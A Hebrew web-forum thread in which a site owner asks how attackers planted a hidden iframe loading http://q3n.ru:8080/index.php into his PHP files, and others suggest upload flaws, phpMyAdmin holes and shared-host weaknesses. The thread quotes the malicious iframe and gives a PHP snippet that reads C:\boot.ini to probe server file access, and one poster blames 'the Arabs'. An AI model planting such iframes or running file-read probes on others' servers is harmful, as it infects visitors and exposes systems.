ערב טוב.
בניתי לפני בערך שנה איזה שהוא אתר.
לפני כמה שבועות כנראה כמה אנשים רעים פרצו לקבצים(במסד נתונים הם לא נגעו, רק בקבצים), והשתילו שם את הקוד הזה:

קוד:

 <iframe src="http://q3n.ru:8080/index.php" width=134 height=135 style="visibility: hidden"></iframe> 

הם מחקו חצי מהתוכן של העמוד והשתילו את הקוד.
אני לא יודע מה יכול לאפשר להם לשנות את תוכן הקבצים שלי.
חברת האיכסון טוענת שהשרת מאובטח, ואין באתר שבניתי מערכת ניהול תוכן שיכולה לשנות קבצים.
אני מנסה לחשוב באיזה דרך יש לפורצים אפשרות לשנות תוכן של קובץ php.
אני אשמח לשמוע כיווני חשיבה, וקישורים(רצוי בעברית) שיעזרו לי לפתור את הבעיה.
לילה טוב ותודה רבה!

יש אצלך פונקציה של העלאת קבצים?

השרת ה"מאובטח" מנוהל על ידי ישראלים?

נמאס לכם לזכור סיסמאות? לחצו כאן!

יש גם טעות של אנשים שמאנקלדים קובץ שאינו PHP בצורה הבאה:

קוד PHP:

 include 'upload/some_image.gif'; 


הקובץ יכול לכלול דברים כמו:

קוד PHP:

<?php /*...*/ ?>

שימי, לא. יש אמנם את עורך הטקסט FCK אבל מעבר לזה אין שום העלאת קובץ.
ולא, האתר מאוכסן בחברת http://bluehost.com

דור, אין לי בקוד דברים כאלה.
ולא הבנתי את החלק השני של התגובה שלך.

יש לך עליו phpMyAdmin?

כן.
למה?

כל כמה זמן יוצא עדכון אבטחה ל phpMyAdmin למשהו שיכול לגרום נזק לא קל למערכת שלך. אם לא מצאת שום מקום שזה יכול לבוא ממנו, לדעתי זה משם.
PHP 4 או 5?

יש חברות איכסות שלא דואגות לאבטח את השרת.
תנסה ליראות אם אתה יכול ע"י PHP להפעיל\לכתוב\לקרא קבצים במערכת, שאינם שלך. ורק לשם הבדיקה, מספיק לכתוב קובץ ב-C:, או לקרוא קובץ. (למשל C:\boot.ini קיים בכל מערכת כימאת. נסה לקרוא את תוכנו)

ו\או תנסה להעלות קיבצי הפעלה כגון EXE , OCX או DLL.

אם אחת ההתקפות הנ"ל פועלות, כניראה שהאנשים הללו פתחו חשבון שדרכו הם מזיקים לחשבונות אחרים.
תוכל מייד לפנות לספק השרת שלך בתלונה...

בהצלחה!

PHP 5. חברת האיכסון טוענת שהשרת מאובטח.

רמי, אתה יכול לתת לי פקודה בPHP? כי אין לי מושג איך להפעיל קובץ מערכת דרך החשבון שלי.
תודה!

המון זמן לא נגעתי ב-PHP אבל נסה קוד כמו זה:

קוד PHP:

<?php
$myFile = "c:\boot.ini";
$fh = fopen($myFile, 'r');
$theData = fread($fh, filesize($myFile));
fclose($fh);
echo $theData;
?>

מה אתה רואה באותו דף?
אם אתה רואה שגיאה אז כניראה חסמו את זה. אין זה אומר שלא ניתן בשיטה אחרת.
אני לא יודע אילו עוד דרכים יש להריץ או לקרוא קבצים ב-PHP...
אז אם זה לא עובד, נסה בגוגל דרך אחרת ו\או התקפה אחרת.

בהצלחה!

אותו דבר קרה גם אצלי, הם שתלו לי בקבצים IFRAME-ים של הכתובת שלהם... יש אפשרות לעלות קבצים אצלי בשרת...

חתימתכם הוסרה כיוון שלא עמדה בחוקי האתר. לפרטים נוספים לחצו כאן. תוכלו לקבל עזרה להתאמת החתימה לחוקים בפורום חתימות וצלמיות.

אני חושד באתר הזה...
http://www.zone-h.org/archive/domain=itzikc20.kuchi.be
זה האתר שלי כבייכול, חפש את שלך אם הוא שם... הם באמת פרצו לי לשרת פעם הערבים האלה ומחקו לי את כל הקבצים, לאחר מכן העלתי גיבוי שיניתי סיסמא, וכנראה שהם שתלו לי את החרא הזה עכשיו...

חתימתכם הוסרה כיוון שלא עמדה בחוקי האתר. לפרטים נוספים לחצו כאן. תוכלו לקבל עזרה להתאמת החתימה לחוקים בפורום חתימות וצלמיות.